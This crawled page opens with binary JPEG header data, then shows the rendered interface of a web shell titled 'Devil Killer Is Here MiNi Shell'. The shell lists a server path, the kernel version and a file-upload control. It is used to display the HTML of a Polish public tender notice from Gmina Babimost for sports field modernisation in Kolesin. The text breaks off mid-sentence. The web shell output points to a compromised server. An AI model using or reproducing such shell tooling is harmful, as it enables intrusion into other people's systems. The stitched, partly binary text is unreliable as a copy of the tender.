JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20221215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20221215/0049918201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> I etap modernizacji infrastruktury sportowej w miejscowości Kolesin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Babimost</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770563</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Babimost</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">babimost@babimost.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.babimost.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> I etap modernizacji infrastruktury sportowej w miejscowości Kolesin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aaf9e684-7c77-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00499182</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00013568/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Modernizacja infrastruktury sportowej przy boisku piłkarskim w m. Kolesin wraz z budową ścieżki rowerowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Za datę przekazania<br/>oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń<br/>oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. Zamawiający przekazuje link do postępowania oraz ID<br/>postępowania w rozdziale I SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu<br/>klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. Ofertę w postępowaniu składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie:<br/>https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna zgodnie z art. 13 RODO - administratorem Pani/Pana danych osobowych jest: Burmistrz Babimostu z siedzibą 66 – 110 Babimost, ul. Rynek 3. Pozostałe informacje znajdują się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BUD.271.42.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest I etap modernizacji infrastruktury sportowej w miejscowości Kolesin polegający na przebudowie i rozbudowie istniejącego boiska sportowego z wydzieleniem płyty głównej i boiska treningowego do piłki nożnej o nawierzchni trawiastej wraz z budową systemu nawadniania głównej płyty boiska na terenie kompleksu sportowego w Kolesinie na terenie działki nr ewid. 82/1, obręb ewidencyjny Kolesin, gmina Babimost, w ramach zadania dofinansowanego ze środków Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych – edycja trzecia - PGR.<br/><br/>Zakres wykonywanych prac: <br/>W zakres robót budowlanych wchodzi:<br/>Przebudowa i rozbudowa istniejącej płyty boiska z wydzieleniem płyty głównej i boiska treningowego. Przebudowa płyt boisk polegać będzie na jej rekultywacji, uprawie i ponownym obsianiu trawą. Wykonane zostanie nawadnianie boiska głównego, co wpłynie na poprawę jakości oraz walorów estetycznych płyty boiska. <br/><br/>Dokumentacja projektowa oraz przedmiary robót uwzględniają system nawadniania dwóch boisk tj. boiska głównego i boiska treningowego, a także ujęte jest wykonanie ogrodzenia zewnętrznego oraz utwardzenie terenu i wykonanie miejsc parkingowych. <br/>Niniejszym zapisem wyłącza się z powyższych dokumentów wykonanie systemu nawadniania boiska treningowego, wykonanie ogrodzenia zewnętrznego oraz utwardzenia terenu dojazdów do miejsc postojowych o nawierzchni z kostki betonowej i wykonania miejsc parkingowych z płyt ażurowych zasypanych grysem dla samochodów osobowych. <br/><br/>Założonym sposobem użytkowania jest funkcjonowanie ogólnodostępnego piłkarskiego obiektu sportowego dla społeczności lokalnej. Obiekt wraz z pozostałymi urządzeniami będzie stanowić uporządkowane i zorganizowane zaplecze dla miejscowości Kolesin.<br/><br/>Zasadnicze elementy wyposażenia budowlano-instalacyjnego:<br/>- piłkochwyty dla każdego z boisk, każdy piłkochwyt o wysokości 6m i długości odpowiednio: 2 x 39,30m dla boiska głównego oraz 2 x 30m dla boiska treningowego,<br/>- studnia obudowana wraz z pompą i pełnym wyposażeniem dla potrzeb nawadniania płyty boiska głównego (wg załączonej dokumentacji projektu robót geologicznych, projektu zagospodarowania terenu oraz projektu budowlanego),<br/>- bramki do piłki nożnej w komplecie z tulejami i haczykami do zawieszenia siatki oraz siatkami na bramki, liczba kompletów: 4 szt.,<br/>- rekultywacja boiska głównego oraz boiska treningowego,<br/>- nawadnianie boiska głównego: 12 zraszaczy sektorowych i 8 zraszaczy pełnoobrotowych.<br/><br/>Zalecane jest wykonanie nawadniania boiska głównego wraz z przygotowaniem podłoża i obsianiem boisk trawą do dnia 15.04.2023 r. <br/>Wykonawca zobowiązany jest prowadzić pielęgnację trawy na płycie boisk w okresie od zasiewu do końca trwania terminu umowy. <br/>Ponadto Wykonawca w ramach umowy przeprowadzi szkolenie osób obsługujących boisko w zakresie pielęgnacji nawierzchni trawiastych płyt boisk piłkarskich.<br/><br/>Zakres robót geologicznych obejmuje:<br/>- wykonanie 1 otworu do głębokości 45,0 m p.p.t w Ø 406 i 357 mm z zabudowaniem kolumny filtracyjnej z rur PCV Ø 225/250 mm, <br/>- wykonanie studni obudowanej wraz z pompą i pełnym wyposażeniem dla potrzeb nawadniania płyty boiska głównego,<br/>- wykonanie próbnego pompowania (pompowanie oczyszczające wykonanego otworu w czasie 24 godzin i pompowanie pomiarowe otworu wykonanego trzema wydajnościami przez 24 godzin każda, z możliwością skrócenia do 16 godzin),<br/>- pobranie próby wody i poddanie jej badaniom fizyko-chemicznym i bakteriologicznym w zakresie podanym w zatwierdzonym projekcie robót geologicznych,<br/>- prace geodezyjne dla wytyczenia lokalizacji wiercenia w terenie i określenia współrzędnych i rzędnej terenu w miejscu wiercenia w układzie państwowym,<br/>- opracowanie powykonawczej dokumentacji hydrogeologicznej i uzyskanie stosownych pozwoleń.<br/><br/>W przypadku braku wody na wskazanej głębokości w projekcie robót geologicznych, należy otwór pogłębić do głębokości na jakiej dostępna będzie woda w ilości niezbędnej do prawidłowego funkcjonowania nawadniania boisk.<br/><br/>Roboty geologiczne należy wykonać zgodnie z dokumentacją projektową robót geologicznych.<br/><br/>Charakterystyczne parametry techniczne boisk:<br/><br/>- wymiary płyty boiska głównego: 105 x 68 [m],<br/>- wymiary boiska treningowego: 62 x 30 [m],<br/>- powierzchnia zabudowy boisk: 9000 m2; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45236119-7 - Naprawa boisk sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232121-6 - Roboty budowlane w zakresie rurociągów nawadniających</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">: Zamawiający wybierze najkorzystniejszą ofertę na podstawie następujących kryteriów oceny ofert:<br/>cena – 60% (waga) oraz gwarancja – 40% (waga).<br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. Uzyskana z wyliczenia ilość punktów zostanie ostatecznie<br/>ustalona z dokładnością do drugiego miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>Spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile nie wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>d) zdolności technicznej lub zawodowej:<br/>Na potwierdzenie spełniania warunku Wykonawca ubiegający się o udzielenie zamówienia wykaże, że:<br/>- zrealizował w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy, to w tym okresie, minimum 1 robotę polegającą na budowie, przebudowie lub rozbudowie systemu automatycznego<br/>nawadniania boiska piłkarskiego, dla którego zostało zainstalowanych min. 10 zraszaczy sektorowych i min. 3 zraszaczy<br/>pełnoobrotowych. Należy również podać wartości zamówień, datę i miejsce wykonania oraz nazwę podmiotów, na rzecz<br/>których zostały wykonane, a także załączeniem dowodów określających, czy te zamówienia zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty;<br/>Ocena spełniania wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenia i<br/>dokumenty złożone przez Wykonawcę w niniejszym postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych potwierdzających b) brak podstaw do wykluczenia:<br/>- oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu:<br/>- zrealizował w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, minimum 1 robotę polegającą na budowie, przebudowie lub rozbudowie systemu automatycznego nawadniania boiska piłkarskiego, dla którego zostało zainstalowanych min. 10 zraszaczy sektorowych i min. 3 zraszaczy pełnoobrotowych. Należy również podać wartości zamówień, datę i miejsce wykonania oraz nazwę podmiotów, na rzecz których zostały wykonane, a także załączeniem dowodów określających, czy te zamówienia zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty- załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 9.400,00 zł (słownie: dziewięć tysięcy czterysta złotych 00/100).<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2019 r., poz. 310, 836 i 1572).<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj.: Nr<br/>rachunku: 97 9660 0007 0000 0941 0200 0003 z adnotacją: „wadium – I etap modernizacji infrastruktury sportowej w<br/>miejscowości Kolesin”.<br/>W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data i<br/>godzina wpływu środków na rachunek bankowy Zamawiającego.<br/>Jeżeli wadium wniesiono w formie innej niż w pieniądzu, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej, poprzez dołączenie do oferty za pośrednictwem miniPortalu.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.4 ppkt 2 - 4, wykonawca<br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie<br/>żądać przez zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Wynagrodzenie za przedmiot umowy płatne będzie w oparciu o udzieloną zaliczkę w wysokości 2 % wynagrodzenia brutto, o którym mowa w ust. 1, jednak nie więcej niż całość wkładu własnego Zamawiającego, następnie ujętej w kwocie faktury końcowej, o której mowa w ust. 1. <br/>Zamawiający w terminie do 30 dni od dnia podpisania umowy po uprzednim protokolarnym przekazaniu terenu budowy wypłaci zaliczkę o której mowa w ust. 5 w wysokości 2 % wynagrodzenia brutto, o którym mowa w ust. 1 , jednak nie więcej niż całość wkładu własnego Zamawiającego na podstawie uzgodnionego wzajemnie dokumentu księgowego wypełniającego dyspozycje ustawy o rachunkowości. <br/> Ostateczne rozliczenie za wykonany przedmiot umowy nastąpi w oparciu o fakturę końcową na całość kwoty o której mowa w ust. 1, z zastrzeżeniem iż wartość wynagrodzenia końcowego wynosić będzie pozostałą część, t. j.: po odjęciu kwoty zaliczki, zryczałtowanego wynagrodzenia należnego Wykonawcy, o którym mowa w ust. 1. Umowa z Wykonawcą inwestycji przewidywać będzie zapewnienie finansowania przez Wykonawcę inwestycji w części niepokrytej udziałem własnym Zamawiającego, na czas poprzedzający wypłatę z Promesy na zasadach wskazanych w ust. 5, z jednoczesnym zastrzeżeniem, że zapłata wynagrodzenia Wykonawcy inwestycji w całości nastąpi po wykonaniu inwestycji w terminie nie dłuższym niż 30 dni od dnia 